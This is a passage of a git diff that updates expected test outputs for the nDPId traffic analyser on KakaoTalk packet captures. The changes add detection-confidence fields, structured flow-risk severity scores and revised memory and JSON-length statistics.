+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00624{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
 00165{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","total-events-serialized":235}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 347/347
@@ -241,10 +241,10 @@
 ~~ total active/idle flows...: 38/38
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4766235 bytes
-~~ total memory freed........: 4766235 bytes
-~~ total allocations/frees...: 100227/100227
+~~ total memory allocated....: 4838044 bytes
+~~ total memory freed........: 4838044 bytes
+~~ total allocations/frees...: 101817/101817
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 170 chars
-~~ json string max len.......: 1721 chars
-~~ json string avg len.......: 1015 chars
+~~ json string max len.......: 1827 chars
+~~ json string avg len.......: 1068 chars
diff --git a/test/results/KakaoTalk_talk.pcap.out b/test/results/KakaoTalk_talk.pcap.out
index 7d7cd622a..760d775c2 100644
--- a/test/results/KakaoTalk_talk.pcap.out
+++ b/test/results/KakaoTalk_talk.pcap.out
@@ -17,14 +17,14 @@
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1430069161833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069161833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUv0AAPwaqgwoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOBNAAACBAV4BAIICgALPk8AAAAAAQMDBw=="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069161865,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069161865,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACioy0AAjgYyVNg63KEKGFK8Abvded6D6B\/TTMkUUBSjubgsAAA="}
-00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
-00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069159456,"flow_last_seen":1430069163198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1430069163198,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":200,"content_type":"application\/octet-stream","user_agent":"MicroMessenger Client"}}
+00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
+00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069159456,"flow_last_seen":1430069163198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1430069163198,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":200,"content_type":"application\/octet-stream","user_agent":"MicroMessenger Client"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069163715,"flow_last_seen":1430069163715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1430069163715,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069163715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069163715,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzn5UAAPwb5gwoYUrxuTI8ygMgfkPcR2OkAAAAAoAI5CAV2AAACBAV4BAIICgALPwwAAAAAAQMDBw=="}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069163856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069163856,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8H5CAyJJ42pD3EdjqoBI4kOpNAAACBAV4BAIICkTbaagACz8MAQMDCQ=="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1430069163867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1430069163867,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTn5kAAPwb5igoYUrxuTI8ygMgfkPcR2OqSeNqRgBAAc1DtAAABAQgKAAs\/HETbaag="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01162{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","6":"Self-signed Certificate","7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01512{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164656,"flow_last_seen":1430069164656,"flow_idle_time":7440000,"flow_min_l4_payload_len":442,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":442,"midstream":1,"ts_msec":1430069164656,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01053{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069164656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":498,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":498,"pkt_l4_len":462,"ts_msec":1430069164656,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAeIKLkAAjgb4AIuWAH0KGFK8Abu3Y2Ij1H9RKASKUBifhj2IAAC2AQAA7+nGaLVdqRc+Gkt7POZ3izYarM8cfC\/oKc57w3ON8GY\/K1szNYS+6Yytrgv9fJ110+svPWy4JXfqhqsy8n\/Qi0EhBo8vKa7TtIo39CMQrfI1DyAke3OCHinKUbcE7JofE08wNW\/SYiLVq+ch1jInTJlBtTETD6sakW5t+\/pqslJuJu6FErHiOcJlRXUhJ\/w2UMRtIuPzDgq66Pu7iQ4cPuLk01HGBYGyY\/ec8L+8kz8C0iE6HOIH6YT0BKGthN3UTgwPbBq6O4DQcUiN2hgrUDIxq8uw9ZbWllzKNEYrEa8k7r3ZVHoPDQdXWrcQvhxam6oeYyK7V8McoNRiSIayjOQMTgXnysBnscEyik7me1vByK2C0l2He7bBFWQmrSmeZXMFh2H60fcsxZbAlEWK0siSqlB7jvAlTaG4udBSGXSTj4rEL2MZLSGqP2XF68ncz4+WzMi\/pNklQw9YyvrinQJFb3QOjkMePALF9ilvEQ+wMia1\/U8MBwJo9G9KKjVSCXjRCZRheUcgsdenusX